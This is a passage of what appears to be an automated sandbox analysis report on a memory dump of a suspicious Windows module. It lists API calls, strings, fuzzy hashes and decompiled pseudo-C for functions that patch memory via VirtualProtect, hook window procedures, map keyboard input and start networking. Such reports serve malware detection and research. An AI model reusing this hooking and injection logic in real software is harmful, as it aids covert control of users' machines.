GetProcAddress.KERNEL32(?,?,00C95A70,00C62ABC,?,?,?,00C62832,?,?,?,?,00C62147), ref: 00C623E7

Strings

NTDLL.DLL, xrefs: 00C623D0
LdrUnregisterDllNotification, xrefs: 00C623E0

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID: LdrUnregisterDllNotification$NTDLL.DLL
API String ID: 3310240892-3940208311
Opcode ID: 83540ccd0aabb7a3334d0ef949b9cd8126c0618dca8ade917d81b5ca2d94c060
Instruction ID: 8f6150dad468d8d912156cc72d98eedd72b53914fc55d1f02ff20a50a3888887
Opcode Fuzzy Hash: 83540ccd0aabb7a3334d0ef949b9cd8126c0618dca8ade917d81b5ca2d94c060
Instruction Fuzzy Hash: 5EF03721216A0081EA649B5AF9D87787361FB88B80F988135DF5E43B64DF38C99AD304

Uniqueness

Uniqueness Score: -1.00%

Function 00C7FA64, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E00C7FA64(void* __ecx, void* __edx, long long __rax, void* __rsi, void* __r8, void* __r9) {
				void* __rbx;
				void* _t5;
				void* _t11;
				void* _t16;
				void* _t22;

				InitializeCriticalSection();
				GetModuleHandleA(??);
				GetProcAddress(??, ??);
				 *0xc95870 = __rax;
				if(__rax != 0) {
					E00C82E70(__rax);
					E00C7EE38(__rax);
					_t5 = E00C7D4E4();
					_t11 = _t5;
					__eflags = _t5;
					if(_t5 == 0) {
						E00C6AEE8();
						E00C81A58(_t16, __rsi, _t22);
						E00C83A68(__eflags);
					}
					return _t11;
				}
				return 0x7f;
			}

0x00c7fa71
0x00c7fa7e
0x00c7fa8e
0x00c7fa94
0x00c7fa9e
0x00c7faa7
0x00c7faac
0x00c7fab1
0x00c7fab6
0x00c7fab8
0x00c7faba
0x00c7fabc
0x00c7fac1
0x00c7fac6
0x00c7fac6
0x00000000
0x00c7facb
0x00000000

APIs

InitializeCriticalSection.KERNEL32(?,?,00000000,00C6C7CA,?,?,?,?,00000008,00C68C59), ref: 00C7FA71
GetModuleHandleA.KERNEL32(?,?,00000000,00C6C7CA,?,?,?,?,00000008,00C68C59), ref: 00C7FA7E
GetProcAddress.KERNEL32(?,?,00000000,00C6C7CA,?,?,?,?,00000008,00C68C59), ref: 00C7FA8E

Strings

user32, xrefs: 00C7FA77
MessageBoxTimeoutA, xrefs: 00C7FA87

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressCriticalHandleInitializeModuleProcSection
String ID: MessageBoxTimeoutA$user32
API String ID: 1068892330-2395250267
Opcode ID: f4914c7cb64e92ce1779adec732baa1abc33016436d9845602781cd254d53612
Instruction ID: 0413953441b02d21f06ac93bd7f1592946bd9dc4a5554de1376bf044975be62a
Opcode Fuzzy Hash: f4914c7cb64e92ce1779adec732baa1abc33016436d9845602781cd254d53612
Instruction Fuzzy Hash: 85F03020311A4192FB25B7B9E89AB6822A4AF54B15F848235D85D45261FF3CC94EE32D

Uniqueness

Uniqueness Score: -1.00%

Function 00C7BF60, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27stringCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00C7BF74
GetClassNameA.USER32 ref: 00C7BF88
lstrcmpiA.KERNEL32 ref: 00C7BF9A
GetParent.USER32 ref: 00C7BFA7

Strings

mdiclient, xrefs: 00C7BF8E

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Parent$ClassNamelstrcmpi
String ID: mdiclient
API String ID: 132458742-1999401180
Opcode ID: 3809e4410b39539c8eed4bc6d2d42539ba30a7a0597496520ae44efb6feb224f
Instruction ID: 902a0310c3417519826532aef54de260ae3ef44aea2b9b2d53dd994c9ef68c51
Opcode Fuzzy Hash: 3809e4410b39539c8eed4bc6d2d42539ba30a7a0597496520ae44efb6feb224f
Instruction Fuzzy Hash: DFF03019351B0681FE24CBA5EC24B7A5350AB44F84F888230DD1E47B65FF2CCA4D9B04

Uniqueness

Uniqueness Score: -1.00%

Function 00C77398, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32 ref: 00C773B0
lstrcatA.KERNEL32 ref: 00C773C2
lstrcatA.KERNEL32 ref: 00C773D8
CreateEventA.KERNEL32 ref: 00C773EC

Strings

OPR, xrefs: 00C773A4

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcat$CreateEventlstrcpy
String ID: OPR
API String ID: 3695347688-3143204451
Opcode ID: 048a184f1b226564831854f818157a5b2e6abb968dc0fa53d1ec01474f01824e
Instruction ID: 762f9538a4dffa38d46748668c9f7a0f6cb2ec435450b96065c655c991ad6cd1
Opcode Fuzzy Hash: 048a184f1b226564831854f818157a5b2e6abb968dc0fa53d1ec01474f01824e
Instruction Fuzzy Hash: BBF05EB231090A93FF248B24E854B9A2321FB48748F808227954E46974DF3CC24DC744

Uniqueness

Uniqueness Score: -1.00%

Function 00C76F18, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32 ref: 00C76F30
lstrcatA.KERNEL32 ref: 00C76F42
lstrcatA.KERNEL32 ref: 00C76F58
CreateEventA.KERNEL32 ref: 00C76F6C

Strings

OPRN, xrefs: 00C76F24

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcat$CreateEventlstrcpy
String ID: OPRN
API String ID: 3695347688-2540104326
Opcode ID: f2ba9ebc16eeb97837ca9502fc3c736bc2b613562156cdf60fef05bac08a86cc
Instruction ID: d6bd50a477afd74035d05a3d12f0b594e2afabcd733344de8a7a33cffda36f84
Opcode Fuzzy Hash: f2ba9ebc16eeb97837ca9502fc3c736bc2b613562156cdf60fef05bac08a86cc
Instruction Fuzzy Hash: DAF05EB231090A93FF348B24E854B9A2321FB48748F808223954E46964DF3CC24DC744

Uniqueness

Uniqueness Score: -1.00%

Function 00C6CEDD, Relevance: 7.6, APIs: 5, Instructions: 138memorywindowCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00C6CF1B
HeapAlloc.KERNEL32 ref: 00C6CF33
GetDC.USER32 ref: 00C6CF47
GetSystemPaletteEntries.GDI32 ref: 00C6CF60
ReleaseDC.USER32 ref: 00C6CF6D

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$AllocEntriesFreePaletteReleaseSystem
String ID:
API String ID: 3186361210-0
Opcode ID: 18967ae1e2cff0128b7e0999dfaca6c9dd43c8deffa828d87cab0de4b4972e37
Instruction ID: 674b110e34f19a3b9fb8c5e52561d1923f38500c18b63bd94bd74fc439de3d55
Opcode Fuzzy Hash: 18967ae1e2cff0128b7e0999dfaca6c9dd43c8deffa828d87cab0de4b4972e37
Instruction Fuzzy Hash: E1418B733145E042E72DCB259859BED3BE6E749B80F45D12AEE9987701CD3CC949C700

Uniqueness

Uniqueness Score: -1.00%

Function 00C62FD8, Relevance: 7.6, APIs: 5, Instructions: 127
memoryCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E00C62FD8(void* __edx, void* __ebp, long long __rbx, long long __rcx, void* __rdx, long long __rsi, void* __rbp, long long __r8, long long _a8, long long _a16, void* _a24, long _a32) {
				void* _v40;
				void* _v64;
				long _v72;
				long long _v88;
				void* __rdi;
				long _t39;
				long _t40;
				long _t43;
				long _t46;
				long _t47;
				void* _t65;
				long long _t66;
				long long _t71;
				long long* _t72;
				intOrPtr* _t74;
				void* _t88;
				void* _t90;
				long long _t93;
				void* _t94;
				void* _t104;
				long long _t105;
				intOrPtr _t106;

				_t94 = __rbp;
				_t75 = __rbx;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __r8;
				_t104 = __rdx;
				_t105 = __rcx;
				r15d = 0;
				r12d = 0;
				_t47 = 0;
				r9d =  *0xc956b4; // 0x3
				if(r9d == 0) {
					L6:
					if(( *(_t105 + 8) & 0x00000001) == 0) {
						_t106 =  *((intOrPtr*)(_t105 + 0x10));
					} else {
						r12d =  *(_t105 + 0x18) & 0x0000ffff;
					}
					_t39 = E00C62888(_t65, _t75,  &_v64);
					_t46 = _t39;
					if(_t39 == 0) {
						_t66 =  *((intOrPtr*)(_t105 + 0x28));
						_t93 = _v64;
						if(_t66 == 0) {
							_t66 =  *((intOrPtr*)(_t105 + 0x20));
						}
						 *((long long*)(_t93 + 0x28)) = _t66;
						_v88 = 0xc62910;
						r9d = r12w & 0xffffffff;
						_t88 =  *_t105;
						E00C64230(0xc62910, _t75, _t104, _t88, _t94, _t106);
						_t77 = 0xc62910;
						if(0xc62910 == 0) {
							r9d = r12w & 0xffffffff;
							_t88 =  *_t105;
							E00C64068(0xc62910, _t104, _t88, _t90, _t93, _t94, _t106);
							_t77 = 0xc62910;
						}
						if(_t77 == 0) {
							_t46 = 2;
							_v72 = 2;
						} else {
							_a32 = 0;
							_t18 = _t88 + 0x38; // 0x40
							r8d = _t18;
							if(VirtualProtect(??, ??, ??, ??) == 0) {
								_t43 = GetLastError();
								_t46 = _t43;
								_v72 = _t43;
							} else {
								 *((long long*)(_t93 + 0x30)) = _t105;
								if( *((intOrPtr*)(_t105 + 0x30)) == _t90) {
									 *((long long*)(_t105 + 0x30)) =  *_t77;
								}
								 *((long long*)(_t93 + 0x10)) =  *_t77;
								 *((long long*)(_t93 + 0x18)) = _t77;
								 *((long long*)(_t93 + 0x20)) =  *_t77;
								 *_t77 =  *((intOrPtr*)(_t93 + 0x28));
								r8d = _a32;
								VirtualProtect(??, ??, ??, ??);
								 *(_t93 + 0x38) =  *(_t93 + 0x38) | 0x00000101;
								EnterCriticalSection(??);
								_t71 =  *0xc95ab0; // 0xc95ab0
								 *_t93 = _t71;
								 *((long long*)(_t93 + 8)) = 0xc95ab0;
								 *((long long*)(_t71 + 8)) = _t93;
								 *0xc95ab0 = _t93;
								LeaveCriticalSection(??);
								_t46 = 0;
								_v72 = 0;
								_t72 = _a24;
								if(_t72 != 0) {
									 *_t72 = _t93;
								}
							}
						}
						if(_t46 != 0) {
							E00C61E84();
						}
					}
					_t40 = _t46;
					goto L26;
				} else {
					_t74 =  *0xc956b8; // 0x20dcd802160
					while(_t104 !=  *_t74) {
						_t47 = _t47 + 1;
						_t74 = _t74 + 8;
						if(_t47 < r9d) {
							continue;
						}
						goto L6;
					}
					_t40 = 0;
					L26:
					return _t40;
				}
			}

0x00c62fd8
0x00c62fd8
0x00c62fd8
0x00c62fdd
0x00c62fe2
0x00c62ff4
0x00c62ff7
0x00c62ffc
0x00c62fff
0x00c63003
0x00c63005
0x00c6300f
0x00c63031
0x00c63036
0x00c6303f
0x00c63038
0x00c63038
0x00c63038
0x00c63048
0x00c6304d
0x00c63051
0x00c63057
0x00c6305b
0x00c63063
0x00c63065
0x00c63065
0x00c63069
0x00c63074
0x00c63079
0x00c63080
0x00c63086
0x00c6308b
0x00c63091
0x00c63093
0x00c6309a
0x00c630a0
0x00c630a5
0x00c630a5
0x00c630ab
0x00c63189
0x00c6318e
0x00c630b1
0x00c630b1
0x00c630c5
0x00c630c5
0x00c630d4
0x00c6317b
0x00c63181
0x00c63183
0x00c630da
0x00c630da
0x00c630e2
0x00c630e7
0x00c630e7
0x00c630ee
0x00c630f2
0x00c630f9
0x00c63101
0x00c6310c
0x00c6311c
0x00c63122
0x00c63130
0x00c63136
0x00c6313d
0x00c63147
0x00c6314b
0x00c6314f
0x00c6315d
0x00c63163
0x00c63165
0x00c63169
0x00c63174
0x00c63176
0x00c63176
0x00c63174
0x00c630d4
0x00c631a1
0x00c631a6
0x00c631a6
0x00c631a1
0x00c631ab
0x00000000
0x00c63011
0x00c63011
0x00c63018
0x00c6301d
0x00c6301f
0x00c63026
0x00000000
0x00000000
0x00000000
0x00c63028
0x00c6302a
0x00c631ad
0x00c631c6
0x00c631c6

APIs

VirtualProtect.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002,00C6333A,?,?,00000004,00C6320E), ref: 00C630CC
VirtualProtect.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002,00C6333A,?,?,00000004,00C6320E), ref: 00C6311C
EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002,00C6333A,?,?,00000004,00C6320E), ref: 00C63130
LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002,00C6333A,?,?,00000004,00C6320E), ref: 00C6315D
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002,00C6333A,?,?,00000004,00C6320E), ref: 00C6317B

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
String ID:
API String ID: 653387826-0
Opcode ID: 1c82b7c32154be67ade6178bcb65a882e59a2dee55f9bcb2a2b2d67d90423c17
Instruction ID: f00608a2d5dc32fea45c7d8f25a0c178f215351e5f9115dda34c3835bd4faf0d
Opcode Fuzzy Hash: 1c82b7c32154be67ade6178bcb65a882e59a2dee55f9bcb2a2b2d67d90423c17
Instruction Fuzzy Hash: 27513936215B8182EB75CF12F884B5EB3A4F749B84F448226DE8E47B24DF38C64AC700

Uniqueness

Uniqueness Score: -1.00%

Function 00C6E054, Relevance: 7.6, APIs: 5, Instructions: 126memorywindowCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00C6E097
HeapAlloc.KERNEL32 ref: 00C6E0AD
GetDC.USER32 ref: 00C6E0C1
GetSystemPaletteEntries.GDI32 ref: 00C6E0DA
ReleaseDC.USER32 ref: 00C6E0E7

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$AllocEntriesFreePaletteReleaseSystem
String ID:
API String ID: 3186361210-0
Opcode ID: b42a28a2fbe6b83df5252cb814859cc9ba61b7794688c65ca4d3ee557ff683d8
Instruction ID: 30a1b0f9b8cb71a45cebd801be3851cd0c14fa1ead8b7986d161eb7d06184536
Opcode Fuzzy Hash: b42a28a2fbe6b83df5252cb814859cc9ba61b7794688c65ca4d3ee557ff683d8
Instruction Fuzzy Hash: 06411873314AD042E729CB25A8557ED3FE6E759F80F4AC11BEA9947702DA39C54AC700

Uniqueness

Uniqueness Score: -1.00%

Function 00C6D7F0, Relevance: 7.6, APIs: 5, Instructions: 115memorywindowCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00C6D82B
HeapAlloc.KERNEL32 ref: 00C6D83F
GetDC.USER32 ref: 00C6D853
GetSystemPaletteEntries.GDI32 ref: 00C6D86C
ReleaseDC.USER32 ref: 00C6D879

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$AllocEntriesFreePaletteReleaseSystem
String ID:
API String ID: 3186361210-0
Opcode ID: e93f558a66880771c7ec8c04669a1fe52827acbb5d299f9f6a52db81bc60e0a4
Instruction ID: 4bdf8c2214af6026868747c018b64cc292b0da6e06ee9fa182575133e00d3d51
Opcode Fuzzy Hash: e93f558a66880771c7ec8c04669a1fe52827acbb5d299f9f6a52db81bc60e0a4
Instruction Fuzzy Hash: F54158733046D042E719CB25A8587ED3BE5E349F80F5AC129EE9A87702DE39C589C740

Uniqueness

Uniqueness Score: -1.00%

Function 00C7A32C, Relevance: 7.6, APIs: 5, Instructions: 76memorystringCOMMON

Download Yara Rule

APIs

PathRemoveBlanksA.SHLWAPI ref: 00C7A35C
PathRemoveArgsA.SHLWAPI ref: 00C7A365
lstrlenA.KERNEL32 ref: 00C7A378
MultiByteToWideChar.KERNEL32 ref: 00C7A3C6
HeapFree.KERNEL32 ref: 00C7A409

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: PathRemove$ArgsBlanksByteCharFreeHeapMultiWidelstrlen
String ID:
API String ID: 1571430455-0
Opcode ID: c77c448289dfb0efc7e2056a9ca0fc8ffdd069d2fc6a1e03b186567b7ff2385a
Instruction ID: 448a6c3f6795251dc92e8fe66cb4dd9f475ddb38bfb798cfcee5681038a62e22
Opcode Fuzzy Hash: c77c448289dfb0efc7e2056a9ca0fc8ffdd069d2fc6a1e03b186567b7ff2385a
Instruction Fuzzy Hash: CB219132311B4186EB24DF22A844B5C7365FB88BF4F549721AE6E03BA4DF38C599C304

Uniqueness

Uniqueness Score: -1.00%

Function 00C64EC4, Relevance: 7.6, APIs: 5, Instructions: 70fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00C64EFE
GetFileSize.KERNEL32 ref: 00C64F12
ReadFile.KERNEL32 ref: 00C64F49
GetLastError.KERNEL32 ref: 00C64F6E
CloseHandle.KERNEL32 ref: 00C64F7F

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$CloseCreateErrorHandleLastReadSize
String ID:
API String ID: 3577853679-0
Opcode ID: 534a6af04a41ebd7af717157045395183d1a68295fd570842df872a23fcf8e84
Instruction ID: 4dff1b8c2fcb308c35b1544ca9af6ba343beafe5175fa7ca9fae40d3929449c0
Opcode Fuzzy Hash: 534a6af04a41ebd7af717157045395183d1a68295fd570842df872a23fcf8e84
Instruction Fuzzy Hash: 0321713230475187F728DFA6A984719B6A1A784FF4F1483259E3947BE4DF38C9468701

Uniqueness

Uniqueness Score: -1.00%

Function 00C69B2C, Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 00C69AD0: EnterCriticalSection.KERNEL32 ref: 00C69AE6
Part of subcall function 00C69AD0: LeaveCriticalSection.KERNEL32 ref: 00C69B18

Part of subcall function 00C69D50: GetClassLongPtrA.USER32 ref: 00C69D6D

GetWindowLongPtrA.USER32 ref: 00C69B9A

Part of subcall function 00C6265C: VirtualProtect.KERNEL32 ref: 00C626A3
Part of subcall function 00C6265C: memcpy.NTDLL ref: 00C626E5

EnterCriticalSection.KERNEL32 ref: 00C69BCA
LeaveCriticalSection.KERNEL32 ref: 00C69BF7
SetWindowLongPtrA.USER32 ref: 00C69C06
GetWindowLongPtrA.USER32 ref: 00C69C15

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalLongSection$Window$EnterLeave$ClassProtectVirtualmemcpy
String ID:
API String ID: 2189526339-0
Opcode ID: 1b5142882a87c563db19f04a8350a57ce3bc143e2fdc48061c82adbe2f2a7d1b
Instruction ID: 23d92ff8158a420be443747d705abbac37f0de1e09e3cc74556e375ac4bc69c7
Opcode Fuzzy Hash: 1b5142882a87c563db19f04a8350a57ce3bc143e2fdc48061c82adbe2f2a7d1b
Instruction Fuzzy Hash: B6215771605F5082FB20DF16F88475973A8F788F90F968629EE5A43764EF38C95AC344

Uniqueness

Uniqueness Score: -1.00%

Function 00C62BD8, Relevance: 7.6, APIs: 5, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?,?,00C62B3A,?,?,?,00C62839,?,?,?,?,00C62147), ref: 00C62C28
VirtualProtect.KERNEL32(?,?,?,?,?,00C62B3A,?,?,?,00C62839,?,?,?,?,00C62147), ref: 00C62C4A
VirtualProtect.KERNEL32(?,?,?,?,?,00C62B3A,?,?,?,00C62839,?,?,?,?,00C62147), ref: 00C62C64
VirtualProtect.KERNEL32(?,?,?,?,?,00C62B3A,?,?,?,00C62839,?,?,?,?,00C62147), ref: 00C62C9C
GetLastError.KERNEL32(?,?,?,?,?,00C62B3A,?,?,?,00C62839,?,?,?,?,00C62147), ref: 00C62CA4

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 37942eebea2ef01a9866a027f3d1cdb914bd492b49a0c66564aff55f4e739575
Instruction ID: 82f5dee2bf69b57d9484524caaa086428c39bd526cddd01a5abbdbaca3169b2f
Opcode Fuzzy Hash: 37942eebea2ef01a9866a027f3d1cdb914bd492b49a0c66564aff55f4e739575
Instruction Fuzzy Hash: 62217F36604A55E7EB24CF2AE44061DBB74F389F94F644112DF8993B28CF39D996CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00C81A58, Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00C81A7C
VkKeyScanA.USER32 ref: 00C81A93
ToAscii.USER32 ref: 00C81ADF
ToAscii.USER32 ref: 00C81B06
GetKeyboardLayoutList.USER32 ref: 00C81B26

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Ascii$KeyboardLayoutListScanmemset
String ID:
API String ID: 648619571-0
Opcode ID: 94a68edb06336e36832264f6bbd4a2f2f445d491a2a526d512bdd80562666cba
Instruction ID: 5a360afa34382edafc2149e45ae03ce8e09659279f1b65b949b4962985b42302
Opcode Fuzzy Hash: 94a68edb06336e36832264f6bbd4a2f2f445d491a2a526d512bdd80562666cba
Instruction Fuzzy Hash: BB21B336618A8097F721CB29F8447DA37A6F3C5755F988216DAD903699CF3CC54ECB04

Uniqueness

Uniqueness Score: -1.00%

Function 00C76060, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 00C76075
HeapAlloc.KERNEL32 ref: 00C76099
HeapFree.KERNEL32 ref: 00C760BB
HeapAlloc.KERNEL32 ref: 00C760DA

Part of subcall function 00C75F38: HeapFree.KERNEL32(?,?,00000000,00C760F9), ref: 00C75F52

Strings

1.1.4, xrefs: 00C7610B

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$Alloc$Free
String ID: 1.1.4
API String ID: 1549400367-362073112
Opcode ID: ccebd975a8d273fb9a5b7265724b5fb93be2d146a8635b4578c663a4eab212bc
Instruction ID: baec4790f7eafe393f657f329b42f87e4a0d841e20ace9ea4c2960db3dc5cc36
Opcode Fuzzy Hash: ccebd975a8d273fb9a5b7265724b5fb93be2d146a8635b4578c663a4eab212bc
Instruction Fuzzy Hash: 2B212EA2612F0082FB15DF32E85475923E4EB9CF58F648225CE1D46768EF38C596C398

Uniqueness

Uniqueness Score: -1.00%

Function 00C68BCC, Relevance: 7.6, APIs: 5, Instructions: 52memorynetworkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00C68C00
HeapAlloc.KERNEL32 ref: 00C68C13
memset.NTDLL ref: 00C68C2A
memcpy.NTDLL ref: 00C68C3A
StrDupA.SHLWAPI ref: 00C68C42

Part of subcall function 00C6C7B8: InitializeCriticalSection.KERNEL32(?,?,?,?,00000008,00C68C59), ref: 00C6C7DB
Part of subcall function 00C6C7B8: CreateEventA.KERNEL32(?,?,?,?,00000008,00C68C59), ref: 00C6C7EC
Part of subcall function 00C6C7B8: CreateThread.KERNELBASE ref: 00C6C813
Part of subcall function 00C6C7B8: GetLastError.KERNEL32(?,?,?,?,00000008,00C68C59), ref: 00C6C82A

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Create$AllocCriticalErrorEventHeapInitializeLastSectionStartupThreadmemcpymemset
String ID:
API String ID: 3488021426-0
Opcode ID: 34b3dd0ed6820cacfe108102cadd2f676e73a015503047924468694898d44d0d
